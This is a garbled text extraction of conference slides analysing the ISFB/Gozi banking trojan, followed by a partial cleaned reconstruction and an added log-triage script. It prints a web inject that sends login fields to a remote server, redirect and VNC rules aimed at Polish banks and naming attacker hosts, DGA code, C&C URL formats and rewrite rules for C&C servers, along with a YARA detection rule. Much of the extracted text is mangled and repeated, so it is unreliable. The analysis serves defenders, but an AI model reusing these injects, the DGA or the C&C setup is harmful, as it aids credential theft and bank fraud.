URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 27: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 28: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB


Web Actions

ACTION REDIRECT - Target myjs128js -> http51016736dimyjs128_plv3js
ACTION REDIRECT - Target myjs28js -> http51016736dimyjs28_plv3js
ACTION REDIRECT - Target ats8gatephp -> http51016736azatsbmidgate128php
ACTION REDIRECT - Target httpswwwcentrum24pl -> http51016736fkcen1php
ACTION REDIRECT - Target httpscompanynetmbankpl -> http51016736fkmbiz1php
ACTION FILE - Target prv
ACTION VNC - Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpscompanynetmbankpl | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpskiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsibiznes2 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsplhomebankin | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpshbfaces | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin

The Bot

Registry Keys

    Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

· Install
· Client
· NetCfg
· LastTask
· LastConfig

Other Actions

· GET_CERTS
· GET_COOKIES
· GET_SYSINFO
· LOAD_EXE
· GET_FILES
· SOCKS_START
· GET_KEYLOG
· GET_MAIL
· GET_FTP
· VNC_START
· URL_BLOCK

Calling Home

ET phone home

· Static domains inside configuration files
· DGA based on a template and the current date
· C&C hidden in the TOR network
· P2P network

DGA (Python)

    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    # rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd >> 1) % len(kwargs['tld'])]  # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)
            ws = len(d)
            if not rnd.rnd % 3:
                ws = 2
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

TOR

P2P (C)

    typedef struct {
        DWORD magic;        // 0x395f2ec1
        DWORD my_secret;
        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                 // 4 random higher bytes of keys
        isfb_p2p_inner_packet p;    // encrypted
    } isfb_p2p_packet;

Internet is Hard

URL format

    https://%s
    user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

    tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY
    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2UljOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg
    t[RAND][RAND]=data

URL format (Python)

    import re
    import pprint

    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    # undo the _XX escaping of '+' and '/' in the base64 path segment
    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='   # padding was stripped by the bot
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

    {'crc': '7001380',
     'id': '1065',
     'ppc': 'xi',
     'server': '12',
     'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca',
     'version': '214887'}

URL format

    t.php         | get new task           | Used until Sep 2015
    c.php         | get new config         | Used until Sep 2015
    d.php         | send stolen data       | Used until Sep 2015
    images/*.gif  | get new task           | current format
    images/*.jpeg | get new config         | current format
    images/*.bmp  | send stolen data       | current format
    images/*.avi  | download 2nd stage dll | not every C&C
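An added example, not code from the talk or from the author's tooling: a Python triage helper that applies the two URL schemes in the table above, the `_XX` unescaping and padding repair from the decode_req snippet, and a Serpent block-alignment check to proxy-log URLs. The host names and base64 blobs are constructed; the path regexes and the 16-byte block check are this example's own heuristics.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Added example (not code from the talk): triage proxy-log URLs against the two
# ISFB C&C URL schemes from the slides and recover the ciphertext each carries.
# Host names and base64 blobs below are constructed for this example.

# Scheme used until Sep 2015: <t|c|d><random>.php?<random>=<base64>
OLD_SCHEME = {"t": "task", "c": "config", "d": "data"}
# Current scheme: images/<base64>.<ext>; the extension selects the handler
NEW_SCHEME = {"gif": "task", "jpeg": "config", "bmp": "data", "avi": "loader"}

_OLD_RE = re.compile(r"^/?([tcd])[^/]*\.php$")
_NEW_RE = re.compile(r"^/?images/([A-Za-z0-9_+/=-]+)\.(gif|jpeg|bmp|avi)$")
_ESC_RE = re.compile(r"_([0-9A-Fa-f]{2})")

SERPENT_BLOCK = 16  # Serpent works on 128-bit blocks


def unescape_b64(seg: str) -> str:
    """Undo the _XX escaping the bot applies to '+' and '/' when base64 travels in a path."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), seg)


def restore_padding(seg: str) -> str:
    """Re-add the '=' padding stripped from the blob (the slide's d + '==' trick, generalised)."""
    seg = seg.rstrip("=")
    return seg + "=" * (-len(seg) % 4)


def decode_segment(seg: str):
    """Return the raw bytes behind a path/query blob, or None if it is not clean base64."""
    try:
        return base64.b64decode(restore_padding(unescape_b64(seg)), validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_request(url: str):
    """Map a URL to (request_type, blob) per the rewrite-rule table, or None if it fits neither scheme."""
    parts = urlsplit(url)
    m = _NEW_RE.match(parts.path)
    if m:
        blob = decode_segment(m.group(1))
        return (NEW_SCHEME[m.group(2)], blob) if blob is not None else None
    m = _OLD_RE.match(parts.path)
    if m and parts.query:
        # A single randomly named parameter carries the blob. The leading letter is all
        # the old scheme exposes, so on its own this match is noisy (any c*.php hits it).
        _, _, value = parts.query.partition("=")
        blob = decode_segment(value)
        return (OLD_SCHEME[m.group(1)], blob) if blob is not None else None
    return None


def is_block_aligned(blob: bytes) -> bool:
    """Serpent output is whole 16-byte blocks; anything else (e.g. a real logo.gif) is dropped."""
    return len(blob) > 0 and len(blob) % SERPENT_BLOCK == 0


# Constructed sample log: "<method> <url>" per line.
SAMPLE_LOG = """\
GET http://cnc.example.test/images/QUJDREVGR0hJSktMTU5PUA.gif
GET http://cnc.example.test/images/QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWY.jpeg
GET http://cnc.example.test/images/_2B_2B_2B_2B_2F_2F_2F_2FQUJDREVGR0hJSg.bmp
GET http://cnc.example.test/tfctq.php?mkvf=QUJDREVGR0hJSktMTU5PUA
GET http://www.example.test/images/logo.gif
GET http://www.example.test/contact.php
"""


def scan_log(text: str):
    """Return (url, request_type, ciphertext_length) for every line that passes both checks."""
    hits = []
    for line in text.splitlines():
        _, _, url = line.partition(" ")
        res = classify_request(url)
        if res and is_block_aligned(res[1]):
            hits.append((url, res[0], len(res[1])))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Without the key the blob stays opaque; the point is to separate ISFB-shaped requests from ordinary image fetches such as logo.gif before spending a decrypt attempt on them.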

C&C response

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control

IAP

    rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1    break;
    rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1.$2   break;
    rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1.$2 break;
    rewrite ^/images/(.*)\.(gif)  /task.php?x=$1.$2   break;
    rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1.$2 break;

Dreambot

    RewriteEngine on
    RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
    RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
    RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
    RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1.$2 [L,QSA]
    RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1.$2 [L,QSA]
